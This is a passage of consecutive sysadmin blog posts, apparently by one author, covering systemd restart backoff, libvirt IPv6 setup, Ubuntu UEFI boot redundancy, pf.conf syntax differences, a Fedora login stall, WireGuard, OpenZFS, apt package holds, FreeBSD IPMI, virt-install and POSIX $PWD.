Things like pppd generally benefit from a certain amount of backoff in their restart attempts, rather than restarting either slowly or rapidly all of the time. If your PPP(oE) link just dropped out briefly because of a hiccup, you want it back right away, not in five or ten minutes, but if there's a significant problem with the link, retrying every second doesn't help (and it may trigger things in your service provider's systems). Systemd supports this sort of backoff if you set 'RestartSteps' and 'RestartMaxDelaySec' to appropriate values. So you could wind up with, for example:

Restart=always
RestartSec=1s
RestartSteps=10
RestartMaxDelaySec=10m

This works fine in general, but there is a problem lurking. Suppose that one day you have a long outage in your service but it comes back, and then a few stable days later you have a brief service blip. To your surprise, your PPPoE session is not immediately restarted the way you expect. What's happened is that systemd doesn't reset its backoff timing just because your service has been up for a while.

To see the current state of your unit's backoff, you want to look at its properties, specifically 'NRestarts' and especially 'RestartUSecNext', which is the delay systemd will put on for the next restart. You see these with 'systemctl show <unit>', or perhaps 'systemctl show -p NRestarts,RestartUSecNext <unit>'. To reset your unit's dynamic backoff time, you run 'systemctl reset-failed <unit>'; this is the same thing you may need to do if you restart a unit too fast and the start stalls.

(I don't know if manually restarting your service with 'systemctl restart <unit>' bumps up the restart count and the backoff time, the way it can cause you to run into (re)start limits.)

At the moment, simply doing 'systemctl reset-failed' doesn't seem to be enough to immediately re-activate a unit that is slumbering in a long restart delay. So the full scale, completely reliable version is probably 'systemctl stop <unit>; systemctl reset-failed <unit>; systemctl start <unit>'. I don't know how you see that a unit is currently in a 'RestartUSecNext' delay, or how much time is left on the delay (such a delay doesn't seem to be a 'job' that appears in 'systemctl list-jobs', and it's not a timer unit so it doesn't show up in 'systemctl list-timers').

If you feel like making your start script more complicated (and it runs as root), I believe that you could keep track of how long this invocation of the service has been running, and if it's long enough, run a 'systemctl reset-failed <unit>' before the script exits. This would (manually) reset the backoff counter if the service has been up for long enough, which is often what you really want.

(If systemd has a unit setting that will already do this, I was unable to spot it.)

Options for adding IPv6 networking to your libvirt based virtual machines

By: cks

Recently, my home ISP switched me from an IPv6 /64 allocation to a /56 allocation, which means that now I can have a bunch of proper /64s for different purposes. I promptly celebrated this by, in part, extending IPv6 to my libvirt based virtual machine, which is on a bridged internal virtual network (cf). Libvirt provides three different ways to provide (public) IPv6 to such virtual machines, all of which will require you to edit your network XML (either inside the virt-manager GUI or directly with command line tools). The three ways aren't exclusive; you can use two of them or even all three at the same time, in which case your VMs will have two or three public IPv6 addresses (at least).

(None of this applies if you're directly bridging your virtual machines onto some physical network. In that case, whatever the physical network has set up for IPv6 is what your VMs will get.)

First, in all cases you're probably going to want an IPv6 '<ip>' block that sets the IPv6 address for your host machine and implicitly specifies your /64. This is an active requirement for two of the options, and typically looks like this:

<ip family='ipv6' address='2001:19XX:0:1102::1' prefix='64'>
[...]
</ip>

Here my desktop will have 2001:19XX:0:1102::1/64 as its address on the internal libvirt network.

The option that is probably the least hassle is to give static IPv6 addresses to your VMs. This is done with <host> elements inside a <dhcp> element (inside your IPv6 <ip>, which I'm not going to repeat):

<dhcp>
  <host name='hl-fedora-36' ip='2001:XXXX:0:1102::189'/>
</dhcp>

Unlike with IPv4, you can't identify VMs by their MAC address because, to quote the network XML documentation:

[...] The IPv6 host element differs slightly from that for IPv4: there is no mac attribute since a MAC address has no defined meaning in IPv6. [...]

Instead you probably need to identify your virtual machines by their (DHCP) hostname. Libvirt has another option for this but it's not really well documented and your virtual machine may not be set up with the necessary bits to use it.

The second least hassle option is to provide a DHCP dynamic range of IPv6 addresses. In the current Fedora 40 libvirt, this has the undocumented limitation that the range can't include more than 65,535 IPv6 addresses, so you can't cover the entire /64. Instead you wind up with something like this:

<dhcp>
  <range start='2001:XXXX:0:1102::1000' end='2001:XXXX:0:1102::ffff'/>
</dhcp>

Famously, not everything in the world does DHCP6; some things only do SLAAC, and in general SLAAC will allocate random IPv6 IPs across your entire /64. Libvirt uses dnsmasq (also) to provide IP addresses to virtual machines, and dnsmasq can do SLAAC (see the dnsmasq manual page). However, libvirt currently provides no directly exposed controls to turn this on; instead, you need to use a special libvirt network XML namespace to directly set up the option in the dnsmasq configuration file that libvirt will generate.

What you need looks like:

<network xmlns:dnsmasq='http://libvirt.org/schemas/network/dnsmasq/1.0'>
[...]
  <dnsmasq:options>
    <dnsmasq:option value='dhcp-range=2001:XXXX:0:1102::,slaac,64'/>
  </dnsmasq:options>
</network>

(The 'xmlns:dnsmasq=' bit is what you have to add to the normal <network> element.)

I believe that this may not require you to declare an IPv6 <ip> section at all, although I haven't tested that. In my environment I want both SLAAC and a static IPv6 address, and I'm happy to not have DHCP6 as such, since SLAAC will allocate a much wider and more varied range of IPv6 addresses.

(You can combine a dnsmasq SLAAC dhcp-range with a regular DHCP6 range, in which case SLAAC-capable IPv6 virtual machines will get an IP address from both, possibly along with a third static IPv6 address.)

PS: Remember to set firewall rules to restrict access to those public IPv6 addresses, unless you want your virtual machines fully exposed on IPv6 (when they're probably protected on IPv4 by virtue of being NAT'd).

Mostly getting redundant UEFI boot disks on modern Ubuntu (especially 24.04)

By: cks

When I wrote about how our primary goal for mirrored (system) disks is increased redundancy, including being able to reboot the system after the primary disk failed, vowhite asked in a comment if there was any trick to getting this working with UEFI. The answer is sort of, and it's mostly the same as you want to do with BIOS MBR booting.

In the Ubuntu installer, when you set up redundant system disks it's long been the case that you wanted to explicitly tell the installer to use the second disk as an additional boot device (in addition to setting up a software RAID mirror of the root filesystem across both disks). In the BIOS MBR world, this installed GRUB bootblocks on the disk; in the UEFI world, this causes the installer to set up an extra EFI System Partition (ESP) on the second drive and populate it with the same sort of things as the ESP on the first drive.

(The 'first' and the 'second' drive are not necessarily what you think they are, since the Ubuntu installer doesn't always present drives to you in their enumeration order.)

I believe that this dates from Ubuntu 22.04, when Ubuntu seems to have added support for multi-disk UEFI. Ubuntu will mount one of these ESPs (the one it considers the 'first') on /boot/efi, and as part of multi-disk UEFI support it will also arrange to update the other ESP. You can see what other disk Ubuntu expects to find this ESP on by looking at the debconf selection 'grub-efi/install_devices'. For perfectly sensible reasons this will identify disks by their disk IDs (as found in /dev/disk/by-id), and it normally lists both ESPs.

All of this is great but it leaves you with two problems if the disk with your primary ESP fails. The first is the question of whether your system's BIOS will automatically boot off the second ESP. I believe that UEFI firmware will often do this, and you can specifically set this up with EFI boot entries through things like efibootmgr (also); possibly current Ubuntu installers do this for you automatically if it seems necessary.

The bigger problem is the /boot/efi mount. If the primary disk fails, a mounted /boot/efi will start having disk IO errors and then if the system reboots, Ubuntu will probably be unable to find and mount /boot/efi from the now gone or error-prone primary disk. If this is a significant concern, I think you need to make the /boot/efi mount 'nofail' in /etc/fstab (per fstab(5)). Energetic people might want to go further and make it either 'noauto' so that it's not even mounted normally, or perhaps mark it as a systemd automounted filesystem with 'x-systemd.automount' (per systemd.mount).

(The disclaimer is that I don't know how Ubuntu will react if /boot/efi isn't mounted at all or is a systemd automount mountpoint. I think that GRUB updates will cope with having it not mounted at all.)

If any disk with an ESP on it fails and has to be replaced, you have to recreate a new ESP on that disk and then, I believe, run 'dpkg-reconfigure grub-efi-amd64', which will ask you to select the ESPs you want to be automatically updated. You may then need to manually run '/usr/lib/grub/grub-multi-install --target=x86_64-efi', which will populate the new ESP (or it may be automatically run through the reconfigure). I'm not sure about this because we haven't had any UEFI system disks fail yet.

(The ESP is a vfat formatted filesystem, which can be set up with mkfs.vfat, and has specific requirements for its GUIDs and so on, which you'll have to set up by hand in the partitioning tool of your choice or perhaps automatically by copying the partitioning of the surviving system disk to your new disk.)

If it was the primary disk that failed, you will probably want to update /etc/fstab to get /boot/efi from a place that still exists (probably with 'nofail' and perhaps with 'noauto'). This might be somewhat easy to overlook if the primary disk fails without the system rebooting, at which point you'd get an unpleasant surprise on the next system reboot.

The general difference between UEFI and BIOS MBR booting for this is that in BIOS MBR booting, there's no /boot/efi to cause problems and running 'grub-install' against your replacement disk is a lot easier than creating and setting up the ESP. As I found out, a properly set up BIOS MBR system also 'knows' in debconf what devices you have GRUB installed on, and you'll need to update this (probably with 'dpkg-reconfigure grub-pc') when you replace a system disk.

(We've been able to avoid this so far because in Ubuntu 20.04 and 22.04, 'grub-install' isn't run during GRUB package updates for BIOS MBR systems so no errors actually show up. If we install any 24.04 systems with BIOS MBR booting and they have system disk failures, we'll have to remember to deal with it.)

(See also my entry on multi-disk UEFI in Ubuntu 22.04, which goes deeper into some details. That entry was written before I knew that a 'grub-*/install_devices' setting of a software RAID array was actually an error on Ubuntu's part, although I'd still like GRUB's UEFI and BIOS MBR scripts to support it.)

Old (Unix) workstations and servers tended to boot in the same ways

By: cks

I somewhat recently read j. b. crawford's ipmi, where in a part crawford talks about how old servers of the late 80s and 90s (Unix and otherwise) often had various features for management like serial consoles. What makes something an old school 80s and 90s Unix server and why they died off is an interesting topic I have views on, but today I want to mention and cover a much smaller one, which is that this sort of early boot environment and low level management system was generally also found on Unix workstations.

By and large, the various companies making both Unix servers and Unix workstations, such as Sun, SGI, and DEC, all used the same boot time system firmware on both workstation models and server models (presumably partly because that was usually easier and cheaper). Since most workstations also had serial ports, the general consequence of this was that you could set up a 'workstation' with a serial console if you wanted to. Some companies even sold the same core hardware as either a server or workstation depending on what additional options you put in it (and with appropriate additional hardware you could convert an old server into a relatively powerful workstation).

(The line between 'workstation' and 'server' was especially fuzzy for SGI hardware, where high end systems could be physically big enough to be found in definite server-sized boxes. Whether you considered these 'servers with very expensive graphics boards' or 'big workstations' could be a matter of perspective and how they were used.)

As far as the firmware was concerned, generally what distinguished a 'server' that would talk to its serial port to control booting and so on from a 'workstation' that had a graphical console of some sort was the presence of (working) graphics hardware. If the firmware saw a graphics board and no PROM boot variables had been set, it would assume the machine was a workstation; if there was no graphics hardware, you were a server.

As a side note, back in those days 'server' models were not necessarily rack-mountable and weren't always designed with the 'must be in a machine room to not deafen you' level of fans that modern servers tend to be found with. The larger servers were physically large and could require special power (and generate enough noise that you didn't want them around you), but the smaller 'server' models could look just like a desktop workstation (at least until you counted up how many SCSI disks were cabled to them).

Sidebar: An example of repurposing older servers as workstations

At one point, I worked with an environment that used DEC's MIPS-based DECstations. DEC's 5000/2xx series were available either as a server, without any graphics hardware, or as a workstation, with graphics hardware. At one point we replaced some servers with better ones; I think they would have been 5000/200s being replaced with 5000/240s. At the time I was using a DECstation 3100 as my system administrator workstation, so I successfully proposed taking one of the old 5000/200s, adding the basic colour graphics module, and making it my new workstation. It was a very nice upgrade.

OpenBSD versus FreeBSD pf.conf syntax for address translation rules

By: cks

I mentioned recently that we're looking at FreeBSD as a potential replacement for OpenBSD for our PF-based firewalls (for the reasons, see that entry). One of the things that will determine how likely we are to try this is how similar the pf.conf configuration syntax and semantics are between OpenBSD pf.conf (which all of our current firewall rulesets are obviously written in) and FreeBSD pf.conf (which we'd have to move them to). I've only done preliminary exploration of this but the news has been relatively good so far.

I've already found one significant syntax (and to some extent semantics) difference between the two PF ruleset dialects, which is that OpenBSD does BINAT, redirection, and other such things by means of rule modifiers; you write a 'pass' or a 'match' rule and add 'binat-to', 'nat-to', 'rdr-to', and so on modifiers to it. In FreeBSD PF, this must be done as standalone translation rules that take effect before your filtering rules. In OpenBSD PF, strategically placed (ie early) 'match' BINAT, NAT, and RDR rules have much the same effect as FreeBSD translation rules, causing your later filtering rules to see the translated addresses; however, 'pass quick' rules with translation modifiers combine filtering and translation into one thing, and there's not quite a FreeBSD equivalent.

That sounds abstract, so let's look at a somewhat hypothetical OpenBSD RDR rule:

pass in quick on $INT_IF proto {udp tcp} \
     from any to <old-DNS-IP> port = 53 \
     rdr-to <new-DNS-IP>

Here we want to redirect traffic to our deprecated old DNS resolver IP to the new DNS IP, but only DNS traffic.

In FreeBSD PF, the straightforward way would be two rules:

rdr on $INT_IF proto {udp tcp} \
    from any to <old-DNS-IP> port = 53 \
    -> <new-DNS-IP> port 53

pass in quick on $INT_IF proto {udp tcp} \
     from any to <new-DNS-IP> port = 53

In practice we would most likely already have the 'pass in' rule, and also you can write 'rdr pass' to immediately pass things and skip the filtering rules. However, 'rdr pass' is potentially dangerous because it skips all filtering. Do you have a single machine that is just hammering your DNS server through this redirection and you want to cut it off? You can't add a useful 'block in quick' rule for it if you have a 'rdr pass', because the 'pass' portion takes effect immediately. There are ways to work around this but they're not quite as straightforward.

(Probably this alone would push us to not using 'rdr pass'; there's also the potential confusion of passing traffic in two different sections of the pf.conf ruleset.)

Fortunately we have very few non-'match' translation rules. Turning OpenBSD 'match ... <whatever>-to <ip>' pf.conf rules into the equivalent FreeBSD '<whatever> ...' rules seems relatively mechanical. We'd have to make sure that the IP addresses our filtering rules saw continued to be the internal ones, but I think this would be work out naturally; our firewalls that do NAT and BINAT translation do it on their external interfaces, and we usually filter with 'pass in' rules.

(There may be more subtle semantic differences between OpenBSD and FreeBSD pf rules. A careful side by side reading of the two pf.conf manual pages might turn these up, but I'm not sure I can read the two manual pages that carefully.)

Why my Fedora 40 systems stalled logins for ten seconds or so

By: cks

One of my peculiarities is that I reboot my Fedora 40 desktops by logging in as root on a text terminal and then running 'reboot' (sometimes or often also telling loginctl to terminate any remainders of my login session so that the reboot doesn't stall for irritating lengths of time). Recently, the simple process of logging in as root has been stalling for an alarmingly long time, enough time to make me think something was wrong with the system (it turns out that the stall was probably ten seconds or so, but even a couple of seconds is alarming for your root login not working). Today I hit this again and this time I dug into what was happening, partly because I was able to reproduce it with something other than a root login to reboot the machine.

My first step was to use the excellent extrace to find out what was taking so long, since this can trace all programs run from one top level process and report how long they took (along with the command line arguments). This revealed that the time consuming command was '/usr/libexec/pk-command-not-found compinit -c', and it was being run as part of quite a lot of commands being executed during shell startup. Specifically, Bash, because on Fedora root's login shell is Bash. This was happening because Bash's normal setup will source everything from /etc/profile.d/ in order to set up your new (interactive) Bash setup, and it turns out that there's a lot there. Using 'bash -xl' I was able to determine that pk-command-not-found was probably being run somehow in /usr/share/lmod/lmod/init/bash. If you're as puzzled as I was about that, lmod (also) is apparently a system for setting up paths for accessing Lua 'modules', so it wants to hook into shell startup to set up its environment variables.

It took me a bit of time to understand how the bits fit together, partly because there's no documentation for pk-command-not-found. The first step is that Bash has a feature that allows you to hook into what happens when a command isn't found (cf, see the discussion of the (potential) command_not_found_handle function), and PackageKit is doing this (in the PackageKit-command-not-found Fedora RPM package, which Fedora installs as a standard feature). It turns out that Bash will invoke this handler function not just for commands you run interactively, but also commands that aren't found while Bash is sourcing all of your shell startup. This handler is being triggered in Lmod's init/bash code because said code attempts to run 'compinit -c' to set up completion in zsh so that it can modify zsh's function search path. Compinit is a zsh thing (it's not technically a builtin), so there is no exposed 'compinit' command on the system. Running compinit outside of zsh is a bug; in this case, an expensive bug.

My solution was to remove both PackageKit-command-not-found, because I don't want this slow 'command not found' handling in general, and also the Lmod package, because I don't use Lmod. Because I'm a certain sort of person, I filed Lmod issue #725 to report the issue.

In some testing in a virtual machine, it appears that pk-command-not-found may be so slow only the first time it's invoked. This means that most people with these packages installed may not see or at least realize what's happening, because under normal circumstances they probably log in to Fedora machines graphically, at which point the login stall is hidden in the general graphical environment startup delay that everyone expects to be slow. I'm in the unusual circumstance that my login doesn't use any normal shell, so logging in as root is the first time my desktops will run Bash interactively and trigger pk-command-not-found.

(This elaborates on and cleans up a Fediverse thread I wrote as I poked around.)

I wish (Linux) WireGuard had a simple way to restrict peer public IPs

By: cks

WireGuard is an obvious tool to build encrypted, authenticated connections out of, over which you can run more or less any network service. For example, you might expose the rsync daemon only over a specific WireGuard interface, instead of running rsync over SSH. Unfortunately, if you want to use WireGuard as a SSH replacement in this fashion, it has one limitation; unlike SSH, there's no simple way to restrict the public IP address of a particular peer.

The rough equivalent of a WireGuard peer is a SSH keypair. In SSH, you can restrict where a keypair will be accepted from with the 'from="..."' restriction in your .ssh/authorized_keys. This provides an extra layer of protection against the key being compromised; not only does an attacker have to acquire the key, they have to be able to use it from exactly the same IP (or the expected IPs). However, more or less by design WireGuard doesn't have a particular restriction on where a WireGuard peer key can be used from. You can set an expected public IP for the peer, but if the peer contacts you from another IP, your (Linux kernel) WireGuard will update its idea of where the peer is. This is handy for WireGuard's usual usage cases but not what we necessarily want for a wired down connection where the IPs should never change.

(I don't think this is a technical restriction in the WireGuard protocol, just something not done in most or all implementations.)

The normal answer is firewall rules that restrict access to the WireGuard port, but this has two limitations. The first and lesser limitation is that it's external to WireGuard, so it's possible to have WireGuard active but your firewall rules not properly applied, theoretically allowing more access than you intend. The bigger limitation is that if you have more than one such wired down WireGuard peer, firewall rules can't tell which WireGuard peer key is being used by which external peer. So in a straightforward implementation of firewall rules, any peer public IP can impersonate any other (if it has the required WireGuard peer key), which is different from the SSH 'from="..."' situation, where each key is restricted separately.

(On the other hand, the firewall situation is better in one way in that you can't accidentally add a WireGuard peer that will be accepted from anywhere the way you can with a SSH key by forgetting to put in a 'from="..."' restriction.)

To get firewall rules that can tell peers apart, you need to use different listening ports for each peer on your end. Today, this requires different WireGuard interfaces (and probably different server keys) for each peer. I think you can probably give all of the interfaces the same internal IP to simplify your life, although I haven't tested this.

(Having written this entry, I now wonder if it would be possible to write an nftables or iptables extension that hooked into the kernel side of WireGuard enough to know peer identities and let you match on them. Existing extensions are already able to be aware of various things like cgroup membership, and there's an existing extension for IPsec. Possibly you could do this with eBPF programs, since there's a BPF/eBPF iptables extension.)

The problems (Open)ZFS can have on new Linux kernel versions

By: cks

Every so often, someone out there is using a normal released version of OpenZFS on Linux (currently ZFS 2.2.6, which was just released) on a distribution that uses very new kernels (such as Fedora). They may then read that their version of ZFS (such as 2.2.5) doesn't list the latest kernel (such as 6.10) as a 'supported platform'. They may then wonder why this is so.

Part of the answer is that OpenZFS developers are cautious people who don't want to list new kernels as officially supported until people have carefully inspected and tested the situation. Even if everything looks good, it's possible that there is some subtle problem in the interface between (Open)ZFS and the new kernel version. But another part of the answer comes down to how the Linux kernel has no stable internal API, which is also part of how you can get subtle problems in new kernels.

The Linux kernel is constantly changing how things work internally. Functions appear or go away (or simply mutate); fields are added or removed from C structs, or sometimes change their meaning; function arguments change; how you're supposed to do things shifts. It's up to any out of tree code, such as OpenZFS, to keep up with these changes (and that's why you want kernel modules to be in the main Linux kernel if possible, because then other people do some of this work). So to merely compile on a new kernel version, OpenZFS may need to change its own code to match the kernel changes. Sometimes this will be simple, requiring almost no changes; other times it may lead to a bunch of modifications.

(Two examples are the master pull request for 6.10, which had only a few changes, and the larger master pull request for 6.11, which may not even be quite complete yet since 6.11 is not yet released.)

Having things compiling is merely the first step. The OpenZFS developers need to make sure that they're making the right changes, and also they generally want to try to see if things have changed in a way that doesn't break compiling code. To quote a message from Rob Norris on the ZFS on Linux mailing list:

"Support" here means that the people involved with the OpenZFS are reasonably certain that the traditional OpenZFS goals of stability, durability, etc will hold when used with that kernel version. That usually means the test suites have passed, there's no significant new issues reported, and at least three people have looked at the kernel changes, the matching OpenZFS changes, and thought very hard about it.

As a practical matter (as Rob Norris notes), this often means that development versions of OpenZFS will often build and work on new kernel versions well before they're officially supported. Speaking from personal experience, it's possible to be using kernel versions that are not yet 'supported' without noticing until you hit an RPM version dependency surprise.

How not to upgrade (some) held packages on Ubuntu (and Debian)

By: cks

We hold a number of packages across our Ubuntu fleet (for good reasons), so that they're only upgraded under controlled circumstances. Which packages are held varies, but they always include the kernel packages (among other issues, we don't want machines to reboot into new kernels by surprise, for example after a crash or a power issue). Some of our hosts are used for testing, and I generally update their kernels (far) more often than our regular machines for various reasons. Until recently I did this with the obvious 'apt-get' command line:

apt-get -u upgrade --with-new-pkgs --ignore-hold

The problem with this is that it upgrades all held packages, not just the kernel. I have historically gotten away with this on the machines I do this on, but recently I got burned (well, more burned my co-workers); as part of a kernel upgrade I also upgraded another package that caused some problems.

Instead what you (I) need to do is to use 'apt-mark unhold <packages>' and then just 'apt-get -u upgrade --with-new-pkgs'. This is less convenient (but at least these days we have apt-mark). I continue to be sad that 'apt-get upgrade' doesn't take package(s) to upgrade and will upgrade everything, so you can't do 'apt-get upgrade linux-image-*' to directly express what you (I) want here.

(Fedora's DNF will do this, along with the inverse option of 'dnf upgrade --exclude=...', and both of these are quite nice.)

You can do this with 'apt-get install', but if you're going to use wildcards in the package name for convenience, you need to be careful and add an extra option, --only-upgrade:

apt-get -u install --only-upgrade 'linux-*'

Otherwise, 'apt-get install ...' will faithfully do exactly what you told it to, which is install or upgrade all of the packages that match the wildcard. If you're using 'apt-get install' to upgrade held packages, you probably don't want that. Despite its name, the --only-upgrade option will install new packages that are required by the packages that you're upgrading, such as new kernel packages that are required by a new version of 'linux-image-generic'.

The one semi-virtue of explicitly unholding packages to upgrade them is that this makes it very obvious that the packages are in fact unheld. An 'apt-get install <packages>' or an 'apt-get upgrade --ignore-hold' will unhold the packages as a side effect. Fortunately we long ago modified our update system to automatically apply our standard package holds before it did anything else (after one too many accidents where we should have re-held a package but forgot).

(I'm sure you could write a cover script to handle all of this, if you wanted to. Currently I don't do this often enough to go that far.)

How to talk to a local IPMI under FreeBSD 14

By: cks

Much like Linux and OpenBSD, FreeBSD is able to talk to a local IPMI using the ipmi kernel driver (or device, if you prefer). This is imprecise although widely understood terminology; in more precise terms, FreeBSD can talk to a machine's BMC (Baseboard Management Controller) that implements the IPMI specification in various ways which you seem to normally not need to care about (for information on 'KCS' and 'SMIC', see the "System Interfaces" section of OpenBSD's ipmi(4)).

Unlike in OpenBSD (covered earlier), the stock FreeBSD 14 kernel appears to report no messages if your machine has an IPMI interface but the driver hasn't been enabled in the kernel. To see if your machine has an IPMI interface that FreeBSD can talk to, you can temporarily load the ipmi module with 'kldload ipmi'. If this succeeds, you will see kernel messages that might look like this:

ipmi0: <IPMI System Interface> port 0xca8,0xcac irq 10 on acpi0
ipmi0: KCS mode found at io 0xca8 on acpi
ipmi0: IPMI device rev. 1, firmware rev. 7.10, version 2.0, device support mask 0xdf
ipmi0: Number of channels 2
ipmi0: Attached watchdog
ipmi0: Establishing power cycle handler

(On the one Dell server I've tried this on so far, the ipmi(4) driver found the IPMI without any special parameters.)

At this point you should have a /dev/ipmi0 device and you can 'pkg install ipmitool' and talk to your IPMI. To make this permanent, you edit /boot/loader.conf to load the driver on boot, by adding:

ipmi_load="YES"

While you're there, you may also want to load the coretemp(4) module or perhaps amdtemp(4). After updating loader.conf, you need to reboot to make it take full effect, although since you can kldload everything before then I don't think there's a rush.

In FreeBSD, IPMI sensor information isn't visible in sysctl (although information from coretemp or amdtemp is). You'll need ipmitool or another suitable program to query it. You can also use ipmitool to configure the basics of the IPMI's networking and set the IPMI administrator's password to something you know, as opposed to whatever unique value the machine's vendor set it to, which you may or may not have convenient access to.

(As far as I can tell, ipmitool works the same on FreeBSD as it does on Linux, so if you have existing scripts and so on that use it for collecting data on your Linux hosts (as we do), they will probably be easy to make work on any FreeBSD machines you add.)

I used libvirt's 'virt-install' briefly and it worked nicely

By: cks

My normal way of using libvirt based virtual machines has been to initially create them in virt-manager using its convenient GUI, if necessary use virt-viewer to access their consoles, and use virsh for basic operations like starting and stopping VMs and rolling VMs back to snapshots, which I make heavy use of. Then recently I wrote about why and how I keep around spare virtual machines, and wound up discovering virt-install, which is supposed to let you easily create (and install) virtual machines from the command line. My first experience with it went well, so now I'm going to write myself some notes.

(I spun up a new virtual machine from scratch in order to poke at FreeBSD a bit.)

Due to having set up a number of VMs through virt-manager, I had already defined the network I wanted as well as a libvirt storage pool where the disks for the new virt-install VM could go. With those already existing, using virt-install was mostly a long list of arguments:

virt-install -n vmguest7 \
   --memory 8192 -vcpus 2 --cpu host \
   -c /virt/images/freebsd/FreeBSD-14.1-RELEASE-amd64-dvd1.iso \
   --osinfo freebsd14.0 \
   --disk size=20 --disk size=20 \
   -w network=netN-macvtap \
   --graphics spice --noautoconsole

(I think I should have used '--cpu host-passthrough' instead, because I think '--cpu host' caused virt-install to copy the host CPU features into the new VM instead of telling the new VM to just use whatever the host had.)

This created a VM with 8 GB of RAM (FreeBSD's minimum recommended amount for root on ZFS), two CPUs that are just like the host, two 20 GByte disks, the right sort of networking (using the already defined libvirt network), and not trying to start any sort of console since I was ssh'd in to the VM host. Once started, I used virt-viewer on my local machine to connect to the console and went through the standard FreeBSD installer in order to gain experience with it and see how it would go when I later did this on physical hardware.

This didn't create quite the same thing that I would normally get in virt-manager; for instance, this VM was created with an 'i440FX' (virtual) chipset instead of the Q35 chipset that I normally use and that may be better (this might be fixed with '--machine q35' or perhaps '--machine pc-q35-6.2'). The 'CDROM' it wound up with is an IDE one instead of a SATA one, although FreeBSD had no objections to it. All of the various differences don't seem to be particularly important, since the result worked and I'm only doing this for testing. The VM's new disks did get sensible file names, ie ones based on the VM's name.

(When the install finished and rebooted, the VM powered off, but this might have been a peculiarity in how I did things.)

Virt-install can create transient VMs with --transient, but as its documentation notes, the disks for these VMs aren't deleted after the VM itself is cleaned up. There are probably ways to use virt-install and some additional tooling to get truly transient VMs, where even their disks are deleted afterward, but I haven't looked at that since right now it's not really a usage case I'm interested in. If I'm spinning up a VM today, I want it to stick around for at least a bit.

(I'm also not interested in virt-builder or the automatic install side of virt-install; to put it one way, I want virtual versions of our physical servers, and they're not installed through cloud-init or other completely automated ways. I do have a limited use for using guestfish to automatically modify VM filesystems.)

What a POSIX shell has to do with $PWD

By: cks

It's reasonably well known about Unix people that '$PWD' is a shell variable with the name of the current working directory. Well, sort of, because sometimes $PWD isn't right or isn't even set (all of this is part of the broader subject of shells and the current directory). Until recently, I hadn't looked up what POSIX has to say about $PWD, and when I did I was surprised, partly because I didn't expect POSIX to say anything about it.

(Until I looked it up, I had the vague impression that $PWD was a common but non-POSIX Bourne shell thing.)

What POSIX has to say is in 2.5.3 Shell Variables part of the overall description of the POSIX shell. To put my own summary on what POSIX says, the shell creates and maintains $PWD in basically all circumstances, and is obliged to update $PWD when it does a 'cd', even in shell scripts. The only case where $PWD's value isn't specified in the shell environment is if you don't have access permissions for the current directory for some reason.

(As far as I can tell, the complicated POSIX wording boils down to that if you start the shell with a correct $PWD that uses symbolic links (eg '/u/cks' instead of '/h/281/cks'), the shell is allowed to update that to the post-symlink 'physical' version but doesn't have to. See how 'pwd -P' is described.)

However, $PWD is not necessarily correct when you're running a program written in C, because POSIX chdir() doesn't seem to be required to update $PWD for you (although it's a bit confusing, since Environment Variables seems to imply that POSIX utilities are entitled to believe $PWD is correct if it's in the environment). In fact I don't think that the POSIX shell is always obliged to export $PWD into the environment, which is why I called it a shell variable instead of an environment variable. I believe most actual Bourne shell implementations do always export $PWD, even if they're started in an environment with it undefined (where I believe POSIX allows it to not be exported).

(Bash, Dash, and FreeBSD's Almquist shell all allow $PWD to be unexported, although keeping it that way may be tricky in Dash and FreeBSD sh, which appear to re-export it any time you do a 'cd'.)

The upshort of this is that in a modern environment where /bin/sh is a POSIX shell, $PWD will almost always be correct. It pretty much has to be correct in your POSIX shell sessions and in your POSIX shell scripts. POSIX-compatible shells like Bash will keep it correct even in their more expansive modes, and non-Bourne shells have a strong motive to go with the show because people expect $PWD to work and be correct.

(However, this leaves me mystified about what the problem was in my specific circumstance this time around, since I'd expect $PWD to have gotten set correctly when my /bin/sh based script used 'cd'.)

Why and how I keep around spare libvirt based virtual machines

By: cks

Recently I mentioned in passing that I keep around spare virtual machines, and in comments Todd quite reasonably asked how one has such a thing (and sort of why one would bother). There are two parts to the answer, a general one and a libvirt one.

The general part is that one sort of my virtual machines are directly on the network, not NAT'd, using specifically assigned static IPs. In order to avoid ever having two VMs accidentally use the same IP, I pre-create a VM for each reserved IP with the (libvirt) name of the VM being its hostname. This still requires configuring each VM's OS with the right IP, but at least accidents are a lot less likely (and in my dominant use for the VMs, I do an initial install of an Ubuntu version with the right IP and then snapshot it).

The libvirt specific part is that I find it a pain in the rear to create a virtual machine, complete with creating and tracking a disk or disks for it, setting various bits and pieces up, and so on. Clever people who do this a lot could probably script it or build generic XML files or similar things, but instead I do it as little as possible, which means that I almost never delete virtual machines even if I'm not using them (although I shut them down). Right now my office desktop has ten VMs configured, none of which are normally running.

(I call this libvirt specific because it's fundamentally a user interface issue, since I could fix it with some sort of provisioning and de-provisioning script that automated all of the fiddly bits for me.)

The most important part of how I keep such VMs as 'spares' is that every time I set up a new VM, I snapshot its initial configuration, complete with a blank initial disk (under the imaginative snapshot name of 'empty-initial'). Then if I want to test something from complete scratch I don't have to go through the effort of making a new VM or erasing the disk of a currently unused one; I just find a currently unused VM, do 'virsh snapshot-revert cksvm5 empty-initial', connect the virtual DVD to an appropriate image (such as the latest FreeBSD or OpenBSD), and then run 'virsh start cksvm5'.

(My earlier entry on how I've set up my libvirt based virtual machines covers the somewhat different way I handle having spare customized Ubuntu VMs that I can use to test things in our standard Ubuntu server environment.)

Using snapshots instead of creating and deleting VMs is probably a bit less efficient at the system level, but not enough for me to notice and care. Having written this, it occurs to me that I could get much the same effect by attaching and detaching virtual disks to the VMs, but with current tooling that would take more work. Libvirt's virsh command line tools make snapshots the easiest approach.

FreeBSD's 'root on ZFS' default appeals to me for an odd reason

By: cks

For reasons beyond the scope of this entry, we're probably going to take a look at FreeBSD as an alternative to OpenBSD for some of our uses of the latter. This got me to grab a 14.1 ISO image and try a quick install on a spare virtual machine (I keep spare VMs around for just such occasions). This caused me to discover that modern FreeBSD defaults to using ZFS for its root filesystem (although I didn't do this on my VM test install, because my VM has less than the recommended RAM for ZFS). FreeBSD using ZFS for its root filesystem makes me happy, but probably not quite for the reasons you're expecting.

Certainly, I like ZFS in general and I think it has a bunch of nice properties, even for a root filesystem. You get checksums for reliability, compression, the ability to easily add sub-filesystems if you want to limit the amount of space something can use (we have usage cases for this, but that's another entry), and so on. But these aren't what make me happy for it as a root filesystem on FreeBSD. The really nice thing about root on ZFS on FreeBSD for me is the easy mirroring.

